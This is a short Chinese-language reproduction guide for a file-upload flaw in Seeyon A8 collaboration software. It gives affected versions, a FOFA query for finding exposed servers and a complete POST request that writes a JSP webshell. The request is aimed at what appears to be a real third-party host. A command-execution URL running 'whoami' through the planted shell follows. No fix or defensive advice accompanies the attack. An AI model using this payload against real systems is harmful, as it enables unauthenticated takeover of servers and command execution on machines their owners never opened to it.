漏洞简介远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务器写入任意文件,写入成功后可执行任意系统命令进而控制目标服务器
影响版本致远A8-V5协同管理软件V6.1sp1致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3致远A8+协同管理软件V7.1
漏洞复现fofa语法:app="致远互联-OA"登录页面如下:
访问目标站点:/seeyon/htmlofficeservlet出现如下图响应,则可能存在该漏洞。
构造以下数据包,上传webshell文件。
POST /seeyon/htmlofficeservlet HTTP/1.1Host: oa.sddetai.com:8889Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 1118DBSTEP V3.0 355 0666 DBSTEP=OKMLlKlVOPTION=S3WYOSWLBSGrcurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66CREATEDATE=wUghPB3szB3Xwg66RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6originalFileId=wV66originalCreateDate=wUghPB3szB3Xwg66FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6needReadFile=yRWZdAS6originalCreateDate=wLSGP4oEzLKAz4=iz=66>a6e4f045d4b8506bf492ada7e3390d7ce
出现如上图的响应就说明文件上传成功访问/seeyon/testtesta.jsp?pwd=calsee&cmd=cmd+/c+whoami,可执行系统命令